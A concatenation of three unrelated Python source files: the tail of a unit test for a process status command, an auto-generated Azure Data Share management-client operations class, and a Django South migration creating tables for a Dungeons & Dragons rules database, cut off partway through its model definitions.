self.assertEquals([(("Status: Stopped\n",), {}),
(("Master pid(s): 3847\n",), {}),
(("Worker pid(s): \n",), {})], sys.stdout.write.call_args_list)
def test_check_pids_are_running(self):
path = os.path.join(FIXTURES_PATH, 'check-running-pids-app')
with patch('sys.stderr'):
CommandInit().run(FakeOptions(app_path=path))
with patch('sys.stdout'):
with patch('os.kill'):
os.kill.side_effect = OSError("No such process")
open(os.path.join(path, "pid/master/3847.pid"), "w")
                # Even having a valid worker pid, the final status must be Stopped because this process does not exist
open(os.path.join(path, "pid/worker/2845.pid"), "w")
CommandStatus().run(FakeOptions(app_path=path))
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Stopped\n",), {}),
(("Master pid(s): 3847\n",), {}),
(("Worker pid(s): 2845(dead)\n",), {})], sys.stdout.write.call_args_list)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ProviderShareSubscriptionsOperations(object):
"""ProviderShareSubscriptionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.datashare.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def adjust(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
provider_share_subscription, # type: "_models.ProviderShareSubscription"
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
"""Adjust the expiration date of a share subscription in a provider share.
Adjust a share subscription's expiration date in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
        :param provider_share_subscription_id: The ID used to locate the share subscription.
:type provider_share_subscription_id: str
:param provider_share_subscription: The provider share subscription.
:type provider_share_subscription: ~azure.mgmt.datashare.models.ProviderShareSubscription
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProviderShareSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.datashare.models.ProviderShareSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.adjust.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(provider_share_subscription, 'ProviderShareSubscription')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
adjust.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/adjust'} # type: ignore
def reinstate(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
provider_share_subscription, # type: "_models.ProviderShareSubscription"
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
"""Reinstate share subscription in a provider share.
Reinstate share subscription in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:param provider_share_subscription: The provider share subscription.
:type provider_share_subscription: ~azure.mgmt.datashare.models.ProviderShareSubscription
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProviderShareSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.datashare.models.ProviderShareSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.reinstate.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(provider_share_subscription, 'ProviderShareSubscription')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
reinstate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/reinstate'} # type: ignore
def _revoke_initial(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self._revoke_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_revoke_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/revoke'} # type: ignore
def begin_revoke(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.ProviderShareSubscription"]
"""Revoke share subscription in a provider share.
Revoke share subscription in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ProviderShareSubscription or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.datashare.models.ProviderShareSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._revoke_initial(
resource_group_name=resource_group_name,
account_name=account_name,
share_name=share_name,
provider_share_subscription_id=provider_share_subscription_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_revoke.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/revoke'} # type: ignore
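# A minimal usage sketch (not part of the generated client; the client and
# resource names below are assumptions for illustration). Assuming `client`
# is an initialized DataShareManagementClient exposing this operations group
# as `provider_share_subscriptions`:
#
#     poller = client.provider_share_subscriptions.begin_revoke(
#         resource_group_name="my-rg",
#         account_name="my-account",
#         share_name="my-share",
#         provider_share_subscription_id="<subscription-id>",
#     )
#     revoked = poller.result()  # blocks until the long-running operation completes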
def get_by_share(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
"""Get share subscription in a provider share.
Get share subscription in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProviderShareSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.datashare.models.ProviderShareSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get_by_share.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_share.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}'} # type: ignore
def list_by_share(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
skip_token=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ProviderShareSubscriptionList"]
"""List of available share subscriptions to a provider share.
List share subscriptions in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param skip_token: Continuation Token.
:type skip_token: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProviderShareSubscriptionList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.datashare.models.ProviderShareSubscriptionList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscriptionList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_share.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if skip_token is not None:
query_parameters['$skipToken'] = self._serialize.query("skip_token", skip_token, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ProviderShareSubscriptionList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_share.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions'} # type: ignore
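# A rough paging sketch (illustrative only; `client` is an assumed
# DataShareManagementClient instance). list_by_share returns an ItemPaged
# iterator, so callers loop over individual ProviderShareSubscription items
# rather than over raw pages:
#
#     for subscription in client.provider_share_subscriptions.list_by_share(
#             "my-rg", "my-account", "my-share"):
#         print(subscription.name)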
|
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'DndEdition'
db.create_table('dnd_dndedition', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=32)),
('system', self.gf('django.db.models.fields.CharField')(max_length=16)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=40, db_index=True)),
))
db.send_create_signal('dnd', ['DndEdition'])
# Adding model 'Rulebook'
db.create_table('dnd_rulebook', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('dnd_edition', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.DndEdition'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('abbr', self.gf('django.db.models.fields.CharField')(max_length=7)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('year', self.gf('django.db.models.fields.CharField')(max_length=4, null=True, blank=True)),
('img_url', self.gf('django.db.models.fields.URLField')(max_length=255, blank=True)),
('official_url', self.gf('django.db.models.fields.URLField')(max_length=255, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['Rulebook'])
# Adding model 'CharacterClass'
db.create_table('dnd_characterclass', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('rulebook', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Rulebook'])),
('page', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)),
('code', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
('prestige', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('dnd', ['CharacterClass'])
# Adding unique constraint on 'CharacterClass', fields ['name', 'rulebook']
db.create_unique('dnd_characterclass', ['name', 'rulebook_id'])
# Adding model 'Domain'
db.create_table('dnd_domain', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('rulebook', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Rulebook'])),
('page', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)),
('code', self.gf('django.db.models.fields.CharField')(unique=True, max_length=32)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['Domain'])
# Adding unique constraint on 'Domain', fields ['name', 'rulebook']
db.create_unique('dnd_domain', ['name', 'rulebook_id'])
# Adding model 'SpellDescriptor'
db.create_table('dnd_spelldescriptor', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=64)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['SpellDescriptor'])
# Adding model 'SpellSchool'
db.create_table('dnd_spellschool', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=32)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=40, db_index=True)),
))
db.send_create_signal('dnd', ['SpellSchool'])
# Adding model 'SpellSubSchool'
db.create_table('dnd_spellsubschool', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=32)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=40, db_index=True)),
))
db.send_create_signal('dnd', ['SpellSubSchool'])
# Adding model 'Spell'
db.create_table('dnd_spell', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('added', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('rulebook', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Rulebook'])),
('page', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('school', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.SpellSchool'])),
('sub_school', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.SpellSubSchool'], null=True, blank=True)),
('verbal_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('somatic_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('material_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('arcane_focus_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('divine_focus_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('xp_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('casting_time', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('range', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('target', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('effect', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('area', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('duration', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('saving_throw', self.gf('django.db.models.fields.CharField')(max_length=128, null=True, blank=True)),
('spell_resistance', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')()),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['Spell'])
# Adding unique constraint on 'Spell', fields ['name', 'rulebook']
db.create_unique('dnd_spell', ['name', 'rulebook_id'])
# Adding M2M table for field descriptors on 'Spell'
db.create_table('dnd_spell_descriptors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('spell', models.ForeignKey(orm['dnd.spell'], null=False)),
('spelldescriptor', models.ForeignKey(orm['dnd.spelldescriptor'], null=False))
))
db.create_unique('dnd_spell_descriptors', ['spell_id', 'spelldescriptor_id'])
# Adding model 'SpellClassLevel'
db.create_table('dnd_spellclasslevel', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('character_class', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.CharacterClass'])),
('spell', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Spell'])),
('level', self.gf('django.db.models.fields.PositiveSmallIntegerField')()),
))
db.send_create_signal('dnd', ['SpellClassLevel'])
# Adding unique constraint on 'SpellClassLevel', fields ['character_class', 'spell']
db.create_unique('dnd_spellclasslevel', ['character_class_id', 'spell_id'])
# Adding model 'SpellDomainLevel'
db.create_table('dnd_spelldomainlevel', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('domain', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Domain'])),
('spell', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Spell'])),
('level', self.gf('django.db.models.fields.PositiveSmallIntegerField')()),
))
db.send_create_signal('dnd', ['SpellDomainLevel'])
# Adding unique constraint on 'SpellDomainLevel', fields ['domain', 'spell']
db.create_unique('dnd_spelldomainlevel', ['domain_id', 'spell_id'])
def backwards(self, orm):
# Removing unique constraint on 'SpellDomainLevel', fields ['domain', 'spell']
db.delete_unique('dnd_spelldomainlevel', ['domain_id', 'spell_id'])
# Removing unique constraint on 'SpellClassLevel', fields ['character_class', 'spell']
db.delete_unique('dnd_spellclasslevel', ['character_class_id', 'spell_id'])
# Removing unique constraint on 'Spell', fields ['name', 'rulebook']
db.delete_unique('dnd_spell', ['name', 'rulebook_id'])
# Removing unique constraint on 'Domain', fields ['name', 'rulebook']
db.delete_unique('dnd_domain', ['name', 'rulebook_id'])
# Removing unique constraint on 'CharacterClass', fields ['name', 'rulebook']
db.delete_unique('dnd_characterclass', ['name', 'rulebook_id'])
# Deleting model 'DndEdition'
db.delete_table('dnd_dndedition')
# Deleting model 'Rulebook'
db.delete_table('dnd_rulebook')
# Deleting model 'CharacterClass'
db.delete_table('dnd_characterclass')
# Deleting model 'Domain'
db.delete_table('dnd_domain')
# Deleting model 'SpellDescriptor'
db.delete_table('dnd_spelldescriptor')
# Deleting model 'SpellSchool'
db.delete_table('dnd_spellschool')
# Deleting model 'SpellSubSchool'
db.delete_table('dnd_spellsubschool')
# Deleting model 'Spell'
db.delete_table('dnd_spell')
# Removing M2M table for field descriptors on 'Spell'
db.delete_table('dnd_spell_descriptors')
# Deleting model 'SpellClassLevel'
db.delete_table('dnd_spellclasslevel')
# Deleting model 'SpellDomainLevel'
db.delete_table('dnd_spelldomainlevel')
models = {
'dnd.characterclass': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'rulebook'),)", 'object_name': 'CharacterClass'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'page': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}),
'prestige': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'rulebook': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Rulebook']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'})
},
'dnd.dndedition': {
'Meta': {'ordering': "['name']", 'object_name': 'DndEdition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '40', 'db_index': 'True'}),
'system': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
'dnd.domain': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'rulebook'),)", 'object_name': 'Domain'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'page': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}),
'rulebook': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Rulebook']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'})
},
'dnd.rulebook': {
'Meta': {'ordering': "['name']", 'object_name': 'Rulebook'},
'abbr': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dnd_edition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.DndEdition']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'official_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'})
},
'dnd.spell': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'rulebook'),)", 'object_name': 'Spell'},
